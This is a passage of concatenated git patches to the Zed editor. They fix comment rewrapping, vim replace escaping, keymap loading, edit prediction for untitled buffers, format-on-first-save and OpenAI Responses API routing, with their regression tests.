If you are seeing things that are unexpected, please file a [GitHub issue](https://github.com/zed-industries/zed/issues/new) or reach out in the #remoting-feedback channel in the [Zed Discord](https://zed.dev/community-links). +If you are struggling with connection issues, you should be able to see more information in the Zed log `cmd-shift-p Open Log`. If you are seeing things that are unexpected, please file a [GitHub issue](https://github.com/zed-industries/zed/issues/new) or reach out in the #support forums on [Discord](https://zed.dev/community-links). ## Supported SSH Options @@ -258,10 +258,6 @@ Note that we deliberately disallow some options (for example `-t` or `-T`) that - You can't open files from the remote Terminal by typing the `zed` command. -## Feedback - -Please join the #remoting-feedback channel in the [Zed Discord](https://zed.dev/community-links). - ## See also - [Running & Testing](./running-testing.md): Run tasks, terminal commands, and From c90a672a72a176e198a25913bccbf221bc3748f1 Mon Sep 17 00:00:00 2001 From: Nathan Witmer Date: Mon, 27 Apr 2026 02:51:08 -0600 Subject: [PATCH 043/231] Fix line comment rewrap in golang and C/C++ (#54931) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54737. #48752 added empty-prefix `block_comment` entries to several language configs (Go, C, C++, JSONC, Python, JSX inner) to support the new toggle-block-comments action. In `Editor::rewrap_impl`, the comment-format matcher used `buffer.contains_str_at(indent_end, &config.prefix)` to decide whether the current line is a continuation of a block comment. 
When the language is configured with an empty prefix, this is true on every line. `//` (and `#`) line comments inside a `comment` override scope were classified as `BlockLine("")` and never reached the line-comment fallback. The result was that the line-comment prefix was not stripped before wrapping and not re-prepended after, embedding `//` markers as text in the wrapped paragraph. Skip the BlockLine arm when the configured prefix is empty so the matcher falls through to `line_comment_prefixes`. I've included regression tests for both golang (which adds a new treesitter dep to the editor package) and C/C++. Release Notes: - Fixed line comment rewrapping in golang and C/C++ --- Cargo.lock | 1 + crates/editor/Cargo.toml | 1 + crates/editor/src/editor.rs | 3 +- crates/editor/src/editor_tests.rs | 56 +++++++++++++++++++++++++++++++ 4 files changed, 60 insertions(+), 1 deletion(-) diff --git a/Cargo.lock b/Cargo.lock index 44cff847bb9799..0149c9e199e408 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -5513,6 +5513,7 @@ dependencies = [ "tracing", "tree-sitter-bash", "tree-sitter-c", + "tree-sitter-go", "tree-sitter-html", "tree-sitter-md", "tree-sitter-python", diff --git a/crates/editor/Cargo.toml b/crates/editor/Cargo.toml index e97cc68c2f956e..c88d1d2c4cd052 100644 --- a/crates/editor/Cargo.toml +++ b/crates/editor/Cargo.toml @@ -124,6 +124,7 @@ settings = { workspace = true, features = ["test-support"] } text = { workspace = true, features = ["test-support"] } theme = { workspace = true, features = ["test-support"] } tree-sitter-c.workspace = true +tree-sitter-go.workspace = true tree-sitter-html.workspace = true tree-sitter-rust.workspace = true tree-sitter-typescript.workspace = true diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index 8110c211a502c3..ee6b2be18b8590 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -14003,7 +14003,8 @@ impl Editor { Some(CommentFormat::BlockCommentWithEnd(config.clone())) } 
(Some(config), _) | (_, Some(config)) - if buffer.contains_str_at(indent_end, &config.prefix) => + if !config.prefix.is_empty() + && buffer.contains_str_at(indent_end, &config.prefix) => { Some(CommentFormat::BlockLine(config.prefix.to_string())) } diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index ea666367127cb2..3a23bb1147b152 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -8451,6 +8451,62 @@ async fn test_rewrap_block_comments(cx: &mut TestAppContext) { } } +#[gpui::test] +async fn test_rewrap_line_comment_in_go(cx: &mut TestAppContext) { + init_test(cx, |settings| { + settings.languages.0.extend([( + "Go".into(), + LanguageSettingsContent { + allow_rewrap: Some(language_settings::RewrapBehavior::InComments), + preferred_line_length: Some(40), + ..Default::default() + }, + )]) + }); + + let mut cx = EditorTestContext::new(cx).await; + + let go_lang = languages::language("go", tree_sitter_go::LANGUAGE.into()); + + cx.update_buffer(|buffer, cx| buffer.set_language(Some(go_lang), cx)); + cx.set_state(indoc! {" + // Lorem ipsum dolor sit amet, consectetur adipiscing elit.ˇ + "}); + cx.update_editor(|e, window, cx| e.rewrap(&Rewrap, window, cx)); + cx.assert_editor_state(indoc! {" + // Lorem ipsum dolor sit amet, + // consectetur adipiscing elit.ˇ + "}); +} + +#[gpui::test] +async fn test_rewrap_line_comment_in_c(cx: &mut TestAppContext) { + init_test(cx, |settings| { + settings.languages.0.extend([( + "C".into(), + LanguageSettingsContent { + allow_rewrap: Some(language_settings::RewrapBehavior::InComments), + preferred_line_length: Some(40), + ..Default::default() + }, + )]) + }); + + let mut cx = EditorTestContext::new(cx).await; + + let c_lang = languages::language("c", tree_sitter_c::LANGUAGE.into()); + + cx.update_buffer(|buffer, cx| buffer.set_language(Some(c_lang), cx)); + cx.set_state(indoc! 
{" + // Lorem ipsum dolor sit amet, consectetur adipiscing elit.ˇ + "}); + cx.update_editor(|e, window, cx| e.rewrap(&Rewrap, window, cx)); + cx.assert_editor_state(indoc! {" + // Lorem ipsum dolor sit amet, + // consectetur adipiscing elit.ˇ + "}); +} + #[gpui::test] async fn test_hard_wrap(cx: &mut TestAppContext) { init_test(cx, |_| {}); From 844646dc2df420cbaaa7d5aabc120390f242338b Mon Sep 17 00:00:00 2001 From: Phillip Davis <80721410+phdavis1027@users.noreply.github.com> Date: Mon, 27 Apr 2026 04:53:44 -0400 Subject: [PATCH 044/231] Fix vim replace not escaping `$` (#53277) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes ##42292 The text inserted in the search ('\$SEARCH') and replace ('$$OTHER') inputs of the top-panel is a little anti-aesthetic, but that seems out of scope for this issue. Release Notes: - '$' in the second clause of vim-style '%s/find/replace/g' actions is correctly escaped. Co-authored-by: Conrad Irwin --- crates/vim/src/normal/search.rs | 42 ++++++++++++++++++- .../test_replace_literal_dollar.json | 25 +++++++++++ 2 files changed, 66 insertions(+), 1 deletion(-) create mode 100644 crates/vim/test_data/test_replace_literal_dollar.json diff --git a/crates/vim/src/normal/search.rs b/crates/vim/src/normal/search.rs index 549e5666834616..e7d17af1e3eb1d 100644 --- a/crates/vim/src/normal/search.rs +++ b/crates/vim/src/normal/search.rs @@ -669,7 +669,9 @@ impl Replacement { // convert a vim query into something more usable by zed. 
// we don't attempt to fully convert between the two regex syntaxes, // but we do flip \( and \) to ( and ) (and vice-versa) in the pattern, - // and convert \0..\9 to $0..$9 in the replacement so that common idioms work. + // convert \0..\9 to $0..$9 in the replacement so that common idioms work, + // and escape literal `$` to `$$` in the replacement so vim's literal `$` + // is not interpreted as a Rust regex capture-group reference. pub(crate) fn parse(mut chars: Peekable) -> Option { let delimiter = chars .next() @@ -692,6 +694,9 @@ impl Replacement { escaped = false; if phase == 1 && c.is_ascii_digit() { buffer.push('$') + } else if phase == 1 && c == '$' { + // Second '$' escapes by fallthrough + buffer.push('$') // unescape escaped parens } else if phase == 0 && (c == '(' || c == ')') { } else if c != delimiter { @@ -714,6 +719,10 @@ impl Replacement { // escape unescaped parens if phase == 0 && (c == '(' || c == ')') { buffer.push('\\') + } else if phase == 1 && c == '$' { + // '$' is not special in the replacement clause, + // so we also escape here. + buffer.push('$') } buffer.push(c) } @@ -757,6 +766,16 @@ mod test { use search::BufferSearchBar; use settings::SettingsStore; + #[test] + fn test_replacement_parse_escaped_dollar() { + let parsed = super::Replacement::parse(r"/\$test/\$rest/g".chars().peekable()) + .expect("parse should succeed"); + + assert_eq!(parsed.search, r"\$test"); + assert_eq!(parsed.replacement, "$$rest"); + assert!(parsed.flag_g); + } + #[gpui::test] async fn test_move_to_next(cx: &mut gpui::TestAppContext) { let mut cx = VimTestContext::new(cx, true).await; @@ -1182,6 +1201,27 @@ mod test { }) } + #[gpui::test] + async fn test_replace_literal_dollar(cx: &mut gpui::TestAppContext) { + let mut cx = NeovimBackedTestContext::new(cx).await; + cx.set_shared_state(indoc! 
{ + "ˇBase=hello + echo $Base" + }) + .await; + + cx.simulate_shared_keystrokes( + ": % s / \\ $ shift-b a s e / \\ $ shift-b a s e shift-n e w / g", + ) + .await; + cx.simulate_shared_keystrokes("enter").await; + + cx.shared_state().await.assert_eq(indoc! { + "Base=hello + ˇecho $BaseNew" + }); + } + #[gpui::test] async fn test_replace_g(cx: &mut gpui::TestAppContext) { let mut cx = NeovimBackedTestContext::new(cx).await; diff --git a/crates/vim/test_data/test_replace_literal_dollar.json b/crates/vim/test_data/test_replace_literal_dollar.json new file mode 100644 index 00000000000000..b5f97f9505c869 --- /dev/null +++ b/crates/vim/test_data/test_replace_literal_dollar.json @@ -0,0 +1,25 @@ +{"Put":{"state":"ˇBase=hello\necho $Base"}} +{"Key":":"} +{"Key":"%"} +{"Key":"s"} +{"Key":"/"} +{"Key":"\\"} +{"Key":"$"} +{"Key":"shift-b"} +{"Key":"a"} +{"Key":"s"} +{"Key":"e"} +{"Key":"/"} +{"Key":"\\"} +{"Key":"$"} +{"Key":"shift-b"} +{"Key":"a"} +{"Key":"s"} +{"Key":"e"} +{"Key":"shift-n"} +{"Key":"e"} +{"Key":"w"} +{"Key":"/"} +{"Key":"g"} +{"Key":"enter"} +{"Get":{"state":"Base=hello\nˇecho $BaseNew","mode":"Normal"}} From d60396bb85ec2c6668b4bcd4ca4725309cd9af9b Mon Sep 17 00:00:00 2001 From: Jakub Profota Date: Mon, 27 Apr 2026 10:55:04 +0200 Subject: [PATCH 045/231] Enable Vim/Helix keybindings when the base keymap is set to None (#54899) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Hi! 👋 When `base_keymap` is set to `None`, it disables all the keybindings, even if `vim_mode` or `helix_mode` is enabled. However, I think the Vim/Helix keybindings should be applied on top of the empty base keymap. My use case for this is to start with the minimal set of Vim/Helix key shortcuts and add other bindings on top of that, instead of flooding the keymap with hundreds of predefined shortcuts from some base keymap. 
--- crates/zed/src/zed.rs | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index 6d1a9c176f1193..2b1ff93581c20e 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -2074,16 +2074,16 @@ fn reload_keymaps(cx: &mut App, mut user_key_bindings: Vec) { pub fn load_default_keymap(cx: &mut App) { let base_keymap = *BaseKeymap::get_global(cx); - if base_keymap == BaseKeymap::None { - return; - } - - cx.bind_keys( - KeymapFile::load_asset(DEFAULT_KEYMAP_PATH, Some(KeybindSource::Default), cx).unwrap(), - ); + if base_keymap != BaseKeymap::None { + cx.bind_keys( + KeymapFile::load_asset(DEFAULT_KEYMAP_PATH, Some(KeybindSource::Default), cx).unwrap(), + ); - if let Some(asset_path) = base_keymap.asset_path() { - cx.bind_keys(KeymapFile::load_asset(asset_path, Some(KeybindSource::Base), cx).unwrap()); + if let Some(asset_path) = base_keymap.asset_path() { + cx.bind_keys( + KeymapFile::load_asset(asset_path, Some(KeybindSource::Base), cx).unwrap(), + ); + } } if VimModeSetting::get_global(cx).0 || vim_mode_setting::HelixModeSetting::get_global(cx).0 { From bfd4118af38e23f9c0ac584cd6450c5d964380c8 Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Mon, 27 Apr 2026 04:59:36 -0400 Subject: [PATCH 046/231] language_models: Fix `is_authenticated` state for Cloud provider (#54826) This PR fixes an issue introduced in https://github.com/zed-industries/zed/pull/54397 where the Zed Cloud provider would not be reflected as "authenticated" if a connection to Collab was attempted, but could not be established. This was especially noticable when running Zed against a local version of Cloud and not having Collab running. This restores the original logic prior to that change. 
Release Notes: - N/A --- crates/language_models/src/provider/cloud.rs | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/crates/language_models/src/provider/cloud.rs b/crates/language_models/src/provider/cloud.rs index 8a5059d63b0420..1c4de9e1afa4d8 100644 --- a/crates/language_models/src/provider/cloud.rs +++ b/crates/language_models/src/provider/cloud.rs @@ -1,6 +1,5 @@ use ai_onboarding::YoungAccountBanner; use anyhow::Result; -use client::Status; use client::{Client, RefreshLlmTokenListener, UserStore, global_llm_token, zed_urls}; use cloud_api_client::LlmApiToken; use cloud_api_types::OrganizationId; @@ -250,8 +249,7 @@ impl LanguageModelProvider for CloudLanguageModelProvider { fn is_authenticated(&self, cx: &App) -> bool { let state = self.state.read(cx); - let status = *state.client.status().borrow(); - matches!(status, Status::Authenticated | Status::Connected { .. }) + !state.is_signed_out(cx) } fn authenticate(&self, cx: &mut App) -> Task> { From 332b226a3c277aae04190f11b7a5a34902a62370 Mon Sep 17 00:00:00 2001 From: Saketh <126517689+SAKETH11111@users.noreply.github.com> Date: Mon, 27 Apr 2026 04:27:26 -0500 Subject: [PATCH 047/231] terminal: Bind Alt+F4 to Close Window in the terminal keymap (#53091) Closes #52774 ## Summary - Bind Windows `Alt+F4` to `workspace::CloseWindow` in the `Terminal` keymap context - Add a regression test covering the built-in Windows terminal keymap entry ## Why When the integrated terminal is focused, `Alt+F4` should close the window instead of falling through to terminal keystroke handling. Handling this in the Windows `Terminal` keymap keeps the fix aligned with the rest of the terminal shortcut overrides. ## Validation - `cargo test -p settings windows_terminal_keymap_closes_window_on_alt_f4` Release Notes: - Fixed Alt+F4 on Windows so Zed closes even when the integrated terminal is focused. 
--------- Co-authored-by: Jakub Konka --- assets/keymaps/default-windows.json | 1 + 1 file changed, 1 insertion(+) diff --git a/assets/keymaps/default-windows.json b/assets/keymaps/default-windows.json index 8651bfbe3b4b93..8d60a68dbc26b6 100644 --- a/assets/keymaps/default-windows.json +++ b/assets/keymaps/default-windows.json @@ -1226,6 +1226,7 @@ "ctrl-delete": ["terminal::SendText", "\u001bd"], "ctrl-n": "workspace::NewTerminal", // Overrides for conflicting keybindings + "alt-f4": "workspace::CloseWindow", "ctrl-b": ["terminal::SendKeystroke", "ctrl-b"], "ctrl-c": ["terminal::SendKeystroke", "ctrl-c"], "ctrl-e": ["terminal::SendKeystroke", "ctrl-e"], From f503aeaaeb3e76f405757d22f1f5e7d18d9d79b1 Mon Sep 17 00:00:00 2001 From: Rocky Shi Date: Mon, 27 Apr 2026 21:31:45 +1200 Subject: [PATCH 048/231] Enable edit prediction and Copilot for untitled buffers (#45764) Closes [#45631](https://github.com/zed-industries/zed/issues/45631) Recording: https://github.com/user-attachments/assets/a5143eb4-fae3-42a7-9d64-fb7c42ee97c2 Release Notes: - copilot: Edit predictions now work in temporary files --------- Co-authored-by: Piotr Osiewicz <24362066+osiewicz@users.noreply.github.com> --- crates/edit_prediction/src/edit_prediction.rs | 2 +- .../src/edit_prediction_tests.rs | 22 +++++++++++++++++++ crates/edit_prediction/src/zeta.rs | 7 ++---- .../zed/src/zed/edit_prediction_registry.rs | 4 +--- 4 files changed, 26 insertions(+), 9 deletions(-) diff --git a/crates/edit_prediction/src/edit_prediction.rs b/crates/edit_prediction/src/edit_prediction.rs index c156e694666e90..f43b94212c0699 100644 --- a/crates/edit_prediction/src/edit_prediction.rs +++ b/crates/edit_prediction/src/edit_prediction.rs @@ -725,7 +725,7 @@ fn compute_diff_between_snapshots_in_range( Some((diff, new_start_point..new_end_point)) } -fn buffer_path_with_id_fallback( +pub(crate) fn buffer_path_with_id_fallback( file: Option<&Arc>, snapshot: &TextBufferSnapshot, cx: &App, diff --git 
a/crates/edit_prediction/src/edit_prediction_tests.rs b/crates/edit_prediction/src/edit_prediction_tests.rs index 8869e1c3f3a52b..6cc38a875e19cf 100644 --- a/crates/edit_prediction/src/edit_prediction_tests.rs +++ b/crates/edit_prediction/src/edit_prediction_tests.rs @@ -3417,6 +3417,28 @@ async fn test_edit_prediction_settled(cx: &mut TestAppContext) { } } +#[gpui::test] +fn test_buffer_path_with_id_fallback_for_untitled_buffers(cx: &mut TestAppContext) { + let buffer_1 = cx.new(|cx| Buffer::local("one", cx)); + let buffer_2 = cx.new(|cx| Buffer::local("two", cx)); + + let snapshot_1 = buffer_1.read_with(cx, |buffer, _| buffer.text_snapshot()); + let snapshot_2 = buffer_2.read_with(cx, |buffer, _| buffer.text_snapshot()); + + let path_1 = cx.read(|cx| buffer_path_with_id_fallback(None, &snapshot_1, cx)); + let path_2 = cx.read(|cx| buffer_path_with_id_fallback(None, &snapshot_2, cx)); + + assert_eq!( + path_1.as_ref(), + Path::new(&format!("untitled-{}", snapshot_1.remote_id())) + ); + assert_eq!( + path_2.as_ref(), + Path::new(&format!("untitled-{}", snapshot_2.remote_id())) + ); + assert_ne!(path_1.as_ref(), path_2.as_ref()); +} + #[gpui::test] async fn test_data_collection_disabled_by_default(cx: &mut TestAppContext) { let (ep_store, _channels) = init_test_with_fake_client(cx); diff --git a/crates/edit_prediction/src/zeta.rs b/crates/edit_prediction/src/zeta.rs index 7b12453353478d..6a287847fd2b0e 100644 --- a/crates/edit_prediction/src/zeta.rs +++ b/crates/edit_prediction/src/zeta.rs @@ -1,7 +1,7 @@ use crate::{ CurrentEditPrediction, DebugEvent, EditPredictionFinishedDebugEvent, EditPredictionId, EditPredictionModelInput, EditPredictionStartedDebugEvent, EditPredictionStore, StoredEvent, - ZedUpdateRequiredError, + ZedUpdateRequiredError, buffer_path_with_id_fallback, cursor_excerpt::{self, compute_cursor_excerpt, compute_syntax_ranges}, prediction::EditPredictionResult, }; @@ -70,10 +70,7 @@ pub fn request_prediction_with_zeta( let preferred_experiment = 
store.preferred_experiment().map(|s| s.to_owned()); let open_ai_compatible_api_key = load_open_ai_compatible_api_key_if_needed(provider, cx); - let excerpt_path: Arc = snapshot - .file() - .map(|file| -> Arc { file.full_path(cx).into() }) - .unwrap_or_else(|| Arc::from(Path::new("untitled"))); + let excerpt_path = buffer_path_with_id_fallback(snapshot.file(), &snapshot.text, cx); let repo_url = if can_collect_data { let buffer_id = buffer.read(cx).remote_id(); diff --git a/crates/zed/src/zed/edit_prediction_registry.rs b/crates/zed/src/zed/edit_prediction_registry.rs index e1245615542753..ad394cc5e760b6 100644 --- a/crates/zed/src/zed/edit_prediction_registry.rs +++ b/crates/zed/src/zed/edit_prediction_registry.rs @@ -258,9 +258,7 @@ fn assign_edit_prediction_provider( ep_store.update(cx, |this, cx| this.start_copilot_for_project(&project, cx)); if let Some(copilot) = copilot { - if let Some(buffer) = singleton_buffer - && buffer.read(cx).file().is_some() - { + if let Some(buffer) = singleton_buffer { copilot.update(cx, |copilot, cx| { copilot.register_buffer(&buffer, cx); }); From f0d23538575af7b92fdfe2762af89d4536c9278d Mon Sep 17 00:00:00 2001 From: galuis116 <116897328+galuis116@users.noreply.github.com> Date: Mon, 27 Apr 2026 02:32:43 -0700 Subject: [PATCH 049/231] settings_ui: Fix switching icon themes from "dynamic" to "static" always selecting the dark theme (#54647) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54646 Release Notes: - Fixed settings behavior where switching Icon Theme from "Dynamic" (System mode) to "Static" now selects the icon theme that matches the current OS appearance (light or dark), 
instead of always defaulting to the dark variant. --------- Co-authored-by: Marshall Bowers --- crates/settings_ui/src/page_data.rs | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/crates/settings_ui/src/page_data.rs b/crates/settings_ui/src/page_data.rs index 5b43d0a18426bd..99dd77b84aebb4 100644 --- a/crates/settings_ui/src/page_data.rs +++ b/crates/settings_ui/src/page_data.rs @@ -622,7 +622,7 @@ fn appearance_page() -> SettingsPage { .as_ref()? .discriminant() as usize]) }, - write: |settings_content, value, _| { + write: |settings_content, value, app| { let Some(value) = value else { settings_content.theme.icon_theme = None; return; @@ -638,7 +638,13 @@ fn appearance_page() -> SettingsPage { match mode { theme_settings::ThemeAppearanceMode::Light => light.clone(), theme_settings::ThemeAppearanceMode::Dark => dark.clone(), - theme_settings::ThemeAppearanceMode::System => dark.clone(), // no cx, can't determine correct choice + theme_settings::ThemeAppearanceMode::System => { + if SystemAppearance::global(app).is_light() { + light.clone() + } else { + dark.clone() + } + } } }, }; From aeb72439d89b3efc1eef88aa37af80e39d6e351d Mon Sep 17 00:00:00 2001 From: Bruna Fernandes <118817701+Bruna-MF@users.noreply.github.com> Date: Mon, 27 Apr 2026 10:33:44 +0100 Subject: [PATCH 050/231] pane: Fix apply formatting when new file is first created (#52692) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ### Description: Previously, formatting was only applied after manually saving the file, once it had already been created and saved. After the fix, when creating a new file from the editor and saving it for the first time with a filename, formatting is automatically applied if “format on save” is enabled. 
### Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [X] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Closes #22534 Release Notes: - Fixed apply formatting when a new file is first created --- crates/workspace/src/pane.rs | 86 ++++++++++++++++++++++++++++++- crates/workspace/src/workspace.rs | 2 +- 2 files changed, 86 insertions(+), 2 deletions(-) diff --git a/crates/workspace/src/pane.rs b/crates/workspace/src/pane.rs index de707c8eb17f11..aa6e53ef666348 100644 --- a/crates/workspace/src/pane.rs +++ b/crates/workspace/src/pane.rs @@ -2486,13 +2486,29 @@ impl Pane { pane.remove_item(item.item_id(), false, false, window, cx); } - item.save_as(project, new_path, window, cx) + item.save_as(project.clone(), new_path, window, cx) })? } else { return Ok(false); }; save_task.await?; + if should_format { + pane.update_in(cx, |pane, window, cx| { + pane.unpreview_item_if_preview(item.item_id()); + item.save( + SaveOptions { + format: true, + autosave: false, + force_format, + }, + project, + window, + cx, + ) + })? 
+ .await?; + } return Ok(true); } } @@ -8025,6 +8041,74 @@ mod tests { }); } + #[gpui::test] + async fn test_format_runs_on_first_save_of_new_file(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + let item = add_labeled_item(&pane, "untitled", true, cx); + item.update(cx, |item, cx| { + item.project_items.push(TestProjectItem::new_untitled(cx)); + }); + assert_item_labels(&pane, ["untitled*^"], cx); + + let close_task = pane.update_in(cx, |pane, window, cx| { + pane.close_item_by_id(item.item_id(), SaveIntent::Save, window, cx) + }); + + cx.executor().run_until_parked(); + cx.simulate_new_path_selection(|_| Some(Default::default())); + close_task.await.unwrap(); + + item.read_with(cx, |item, _| { + assert_eq!(item.save_as_count, 1); + assert_eq!( + item.save_count, 1, + "formatter should run after the file is given a path on first save" + ); + }); + } + + #[gpui::test] + async fn test_format_does_not_run_on_first_save_when_save_without_format( + cx: &mut TestAppContext, + ) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + let item = add_labeled_item(&pane, "untitled", true, cx); + item.update(cx, |item, cx| { + item.project_items.push(TestProjectItem::new_untitled(cx)); + }); + assert_item_labels(&pane, ["untitled*^"], cx); + + let close_task = pane.update_in(cx, |pane, window, cx| { + pane.close_item_by_id(item.item_id(), SaveIntent::SaveWithoutFormat, window, cx) + }); + + cx.executor().run_until_parked(); + 
cx.simulate_new_path_selection(|_| Some(Default::default())); + close_task.await.unwrap(); + + item.read_with(cx, |item, _| { + assert_eq!(item.save_as_count, 1); + assert_eq!( + item.save_count, 0, + "formatter should not run when SaveWithoutFormat is used" + ); + }); + } + #[gpui::test] async fn test_discard_does_not_reload_multibuffer(cx: &mut TestAppContext) { init_test(cx); diff --git a/crates/workspace/src/workspace.rs b/crates/workspace/src/workspace.rs index 8b54a995a87e07..b0c5d3cb97df50 100644 --- a/crates/workspace/src/workspace.rs +++ b/crates/workspace/src/workspace.rs @@ -11521,7 +11521,7 @@ mod tests { // The requested items are closed. pane.update(cx, |pane, cx| { - assert_eq!(item4.read(cx).save_count, 0); + assert_eq!(item4.read(cx).save_count, 1); assert_eq!(item4.read(cx).save_as_count, 1); assert_eq!(item4.read(cx).reload_count, 0); assert_eq!(pane.items_len(), 1); From 3ef140cb4e5ac04b2d019ef9826ad92c4762de54 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 27 Apr 2026 11:52:51 +0200 Subject: [PATCH 051/231] open_ai: Use responses API for all models (#54910) From the [docs](https://developers.openai.com/api/docs/guides/migrate-to-responses#responses-benefits): > Better performance: Using reasoning models, like GPT-5, with Responses will result in better model intelligence when compared to Chat Completions. Our internal evals reveal a 3% improvement in SWE-bench with same prompt and setup. Agentic by default: The Responses API is an agentic loop, allowing the model to call multiple tools, like web_search, image_generation, file_search, code_interpreter, remote MCP servers, as well as your own custom functions, within the span of one API request. Lower costs: Results in lower costs due to improved cache utilization (40% to 80% improvement when compared to Chat Completions in internal tests). Stateful context: Use store: true to maintain state from turn to turn, preserving reasoning and tool context from turn-to-turn. 
Flexible inputs: Pass a string with input or a list of messages; use instructions for system-level guidance. Encrypted reasoning: Opt-out of statefulness while still benefiting from advanced reasoning. Future-proof: Future-proofed for upcoming models. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - Always use Responses API for OpenAI models --- crates/language_models/src/provider/open_ai.rs | 16 ++++++++-------- crates/open_ai/src/open_ai.rs | 9 ++------- 2 files changed, 10 insertions(+), 15 deletions(-) diff --git a/crates/language_models/src/provider/open_ai.rs b/crates/language_models/src/provider/open_ai.rs index c018a8da424fd2..5557ce2d047887 100644 --- a/crates/language_models/src/provider/open_ai.rs +++ b/crates/language_models/src/provider/open_ai.rs @@ -384,34 +384,34 @@ impl LanguageModel for OpenAiLanguageModel { LanguageModelCompletionError, >, > { - if self.model.supports_chat_completions() { - let request = into_open_ai( + if self.model.uses_responses_api() { + let request = into_open_ai_response( request, self.model.id(), self.model.supports_parallel_tool_calls(), self.model.supports_prompt_cache_key(), self.max_output_tokens(), self.model.reasoning_effort(), - false, ); - let completions = self.stream_completion(request, cx); + let completions = self.stream_response(request, cx); async move { - let mapper = OpenAiEventMapper::new(); + let mapper = OpenAiResponseEventMapper::new(); Ok(mapper.map_stream(completions.await?).boxed()) } .boxed() } else { - let request = into_open_ai_response( + let request = into_open_ai( request, self.model.id(), 
self.model.supports_parallel_tool_calls(), self.model.supports_prompt_cache_key(), self.max_output_tokens(), self.model.reasoning_effort(), + false, ); - let completions = self.stream_response(request, cx); + let completions = self.stream_completion(request, cx); async move { - let mapper = OpenAiResponseEventMapper::new(); + let mapper = OpenAiEventMapper::new(); Ok(mapper.map_stream(completions.await?).boxed()) } .boxed() diff --git a/crates/open_ai/src/open_ai.rs b/crates/open_ai/src/open_ai.rs index e555235b993fd3..5d313272548477 100644 --- a/crates/open_ai/src/open_ai.rs +++ b/crates/open_ai/src/open_ai.rs @@ -272,17 +272,12 @@ impl Model { } } - pub fn supports_chat_completions(&self) -> bool { + pub fn uses_responses_api(&self) -> bool { match self { Self::Custom { supports_chat_completions, .. - } => *supports_chat_completions, - Self::FiveCodex - | Self::FivePointTwoCodex - | Self::FivePointThreeCodex - | Self::FivePointFourPro - | Self::FivePointFivePro => false, + } => !*supports_chat_completions, _ => true, } } From c8650d44b77fd1c17a759ec92dfc4382da714cda Mon Sep 17 00:00:00 2001 From: Austin Cummings Date: Mon, 27 Apr 2026 02:54:48 -0700 Subject: [PATCH 052/231] git_ui: Replace commit message generation spinner with a cancel button (#49540) When a model produces poor output during commit message generation, there was no way to cancel it. This replaces the non-interactive spinner with a Stop button that cancels the generation task. Partial generated text is kept in the editor. 
Partially addresses #33556 2026-02-18-160103_hyprshot --- Before you mark this PR as ready for review, make sure that you have: - [x] Added a solid test coverage and/or screenshots from doing manual testing - [x] Done a self-review taking into account security and performance aspects - [x] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) Release Notes: - Added a button to stop commit message generation in the git panel --------- Co-authored-by: Danilo Leal Co-authored-by: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> --- crates/git_ui/src/git_panel.rs | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index 1e53c1cf53e315..62f8edcfbd87fc 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -71,8 +71,8 @@ use strum::{IntoEnumIterator, VariantNames}; use theme_settings::ThemeSettings; use time::OffsetDateTime; use ui::{ - ButtonLike, Checkbox, CommonAnimationExt, 